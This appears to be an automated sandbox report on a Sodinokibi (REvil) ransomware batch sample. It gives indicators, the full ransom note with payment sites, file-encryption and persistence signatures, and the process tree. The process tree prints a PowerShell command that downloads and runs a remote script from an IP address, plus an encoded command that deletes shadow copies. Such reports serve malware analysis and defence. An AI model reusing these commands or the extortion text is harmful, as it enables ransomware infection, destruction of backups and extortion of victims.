Analysis
-
max time kernel
148s -
resource
win7v191014 -
submitted
16-12-2019 11:10
Task
task1
Sample
wKmecP8k.bat
Resource
win7v191014
0 signatures
General
-
Target
wKmecP8k.bat
-
Sample
191216-t3y4krh43n
-
SHA256
a2d1bfcdf15107fc32cacf9b39a4eb453610f20fc79328e3428c1551cf03e356
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/wKmecP8k
Extracted
Language
ps1
Source
Extracted
Path
C:\o0371501r-readme.txt
Family
sodinokibi
Ransom Note
---=== Welcome. Again. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension o0371501r.
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
[+] What guarantees? [+]
Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.
[+] How to get access on website? [+]
You have two ways:
1) [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EC6570002F081545
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
b) Open our secondary website: http://decryptor.top/EC6570002F081545
Warning: secondary website can be blocked, thats why first variant much better and more available.
When you open our website, put the following data in the input form:
Key:
X++vTsZZ5SfmX1BKxZ5AMUlnfCvA6AuSfbHI07L7VA2DfW0omuBF2MLAjT/rQomj
Qa6qCZoHTaQkXlLzuJcXoubejwGPHl9gKuMObZg4GRVRNo4VdRsQ3oHK7GviIL/K
l/bJziz/ntyvcNSzsMh0Qps7WmaBkFb5DPdPjc2OKvxU1jDDxltFmI5Oxe/vISqO
GoN37FTbJqXRU+NLNlPn5rhBqdu/oKFRgZssy8sU5fZKM0Vw2xcQ/OZAwyhPUgSz
4J+sK9OUNpBDMSD74ZaLvmLVoenSVU0KF5Zj8MMSljP1maUbgCu7/+K9yf0AZjYj
oWh9V2YZiadQ5IvsuGoEuyVDM57nXLa8c6OFYpTrHmPHqwQxM7sKiteUSFRzz95O
xLWAAG9W8PrA7VSwZQbZxlsvewwwOaB4TqVDJ5VIJ1mwRSCq4IqT5sYpWWGqXlnW
QyYNjWhyH8DF8QdMdlWtUenZqdOFYUIzvJwVzDsyAEhuzY4YyRUFeJb3tGgcsVUP
TLSgISrh7QH/djTb+qTdiwYL2Mu76yTW0jll82Zvs8rblxRbPtczMpE9eWBTcdJe
8N5BckxMeoqwgEzrRb18tSmtnywPiDyRYqmn+UbQWV3SUK3RSdE7EcGOplqw8g3t
0N4FpGo4cr6PaST7kicgGQhhZ4ECBg18hTeiWOdw+xzOQNvlCcnnUHK7P4NfG/tM
usW2gzuwGK4NyibMO0ygPxBHiBxmp7cFxF70YPPpWBmllzrWzbBDJigHxvKsVZpT
j5po74WRjj1nZ6EsOa9stlqAu6YddhhzA/+87uP3+JvPo8+XOEd35S3PSK7+pQSX
IDPxRSdtkDv9O6cPQ7rfCI5v0jci2dIaQzEOhIE1v+ogXGFm0IwJdVYYS+p3Wyi0
iROoJTs88ZSYln36O/Hm/ge2PD9m2HNq8rAWpQLMZRnKMFgaCLtD2s7kIo6yjfwm
5tz0BguJP64naa8SUOh0JNDjt/dKSF1rO2zcrwyD+zey894uNA7Trn26fPNtdBIv
50jfdcdiXyfEYKJB3+O63r2R6tWCT3gpuWXG635qC7uIK9Y0VfOowCSiHtzMVqap
YwtwaWJF8ZJm1yHnU5ubukkxPStTwD52UQocvELGdyZM4/6oDsgRY/+TnJEAXxvQ
BR9Uf8LV5xNr/PIKLJ4bEog6
Extension name:
o0371501r
--------------------------------------------------------------------------------------
!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!
URLs
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EC6570002F081545
http://decryptor.top/EC6570002F081545
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1048 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1368 wrote to memory of 1048 1368 cmd.exe powershell.exe PID 1048 wrote to memory of 856 1048 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1048 powershell.exe Token: SeDebugPrivilege 856 powershell.exe Token: SeBackupPrivilege 456 vssvc.exe Token: SeRestorePrivilege 456 vssvc.exe Token: SeAuditPrivilege 456 vssvc.exe -
Discovering connected drives 3 TTPs 7 IoCs
Processes:
powershell.execmd.exepowershell.exedescription ioc process File opened (read-only) \??\A: powershell.exe File opened (read-only) \??\B: powershell.exe File opened (read-only) \??\E: powershell.exe File opened (read-only) \??\C: cmd.exe File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\F: powershell.exe File opened (read-only) \??\C: powershell.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Drops file in Program Files directory 35 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\JoinMove.vbs powershell.exe File renamed C:\Program Files\DebugRevoke.txt => \??\c:\program files\DebugRevoke.txt.o0371501r powershell.exe File renamed C:\Program Files\PublishCopy.ppt => \??\c:\program files\PublishCopy.ppt.o0371501r powershell.exe File opened for modification \??\c:\program files\StepConnect.temp powershell.exe File created \??\c:\program files\o0371501r-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertFromGet.xla powershell.exe File renamed C:\Program Files\ExitSelect.lnk => \??\c:\program files\ExitSelect.lnk.o0371501r powershell.exe File opened for modification \??\c:\program files\PushFormat.jpe powershell.exe File renamed C:\Program Files\JoinMove.vbs => \??\c:\program files\JoinMove.vbs.o0371501r powershell.exe File renamed C:\Program Files\UnregisterEnable.ods => \??\c:\program files\UnregisterEnable.ods.o0371501r powershell.exe File created \??\c:\program files (x86)\o0371501r-readme.txt powershell.exe File renamed C:\Program Files\ConvertFromGet.xla => \??\c:\program files\ConvertFromGet.xla.o0371501r powershell.exe File opened for modification \??\c:\program files\PublishCopy.ppt powershell.exe File opened for modification \??\c:\program files\WaitDebug.mhtml powershell.exe File renamed C:\Program Files\UnprotectWait.html => \??\c:\program files\UnprotectWait.html.o0371501r powershell.exe File opened for modification \??\c:\program files\DebugRevoke.txt powershell.exe File renamed C:\Program Files\ImportLimit.rm => \??\c:\program files\ImportLimit.rm.o0371501r powershell.exe File opened for modification \??\c:\program files\MountBlock.xltx powershell.exe File renamed C:\Program Files\MountBlock.xltx => \??\c:\program files\MountBlock.xltx.o0371501r powershell.exe File renamed C:\Program Files\PushFormat.jpe => \??\c:\program files\PushFormat.jpe.o0371501r powershell.exe File renamed C:\Program Files\StepConnect.temp => \??\c:\program files\StepConnect.temp.o0371501r powershell.exe File renamed C:\Program Files\ConfirmUpdate.mpeg2 => \??\c:\program files\ConfirmUpdate.mpeg2.o0371501r powershell.exe File opened for modification \??\c:\program files\RegisterJoin.vsd powershell.exe File renamed C:\Program Files\RegisterJoin.vsd => \??\c:\program files\RegisterJoin.vsd.o0371501r powershell.exe File opened for modification \??\c:\program files\UnprotectWait.html powershell.exe File renamed C:\Program Files\WaitDebug.mhtml => \??\c:\program files\WaitDebug.mhtml.o0371501r powershell.exe File opened for modification \??\c:\program files\ExitSelect.lnk powershell.exe File opened for modification \??\c:\program files\UnregisterEnable.ods powershell.exe File renamed C:\Program Files\UseSkip.xps => \??\c:\program files\UseSkip.xps.o0371501r powershell.exe File opened for modification \??\c:\program files\ConfirmUpdate.mpeg2 powershell.exe File opened for modification \??\c:\program files\ImportLimit.rm powershell.exe File created \??\c:\program files\microsoft sql server compact edition\o0371501r-readme.txt powershell.exe File opened for modification \??\c:\program files\UseSkip.xps powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\o0371501r-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\o0371501r-readme.txt powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
conhost.exepid process 1100 conhost.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 1048 powershell.exe 856 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
description ioc Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\w82my5i9actb.bmp" -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Processes:
description ioc Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b1900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd90b000000010000001200000044006900670069004300650072007400000014000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1556200000001000000200000004348a0e9444c78cb265e058d5e8944b4d84f9662bd26db257f8934a443c701615300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703082000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0400000001000000100000001d3554048578b03f42424dbf20730a3f0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b19000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c03000000010000001400000002faf3e291435468607857694df5e45b688518681d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030720000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b0601050507030406082b0601050507030106082b0601050507030206082b06010505070308060a2b0601040182370a0304060a2b0601040182370a030c6200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality
-
Adds Run entry to start application 2 TTPs 1 IoCs
Processes:
description ioc Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\sNpEShi30R = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\wKmecP8k.bat"1⤵
- Suspicious use of WriteProcessMemory
- Discovering connected drives
PID:1368 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/wKmecP8k');Invoke-KSPUREEKGNMIALY;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Discovering connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
PID:1048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Discovering connected drives
- Suspicious behavior: EnumeratesProcesses
PID:856
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-11829547421812937322-18238739831590957330898537487-424150329-1259984517-303643781"1⤵
- Suspicious use of SetWindowsHookEx
PID:1100
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1153012532-17751320222774113601082764279-529990295755984812-1260573584319538335"1⤵PID:1332
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:456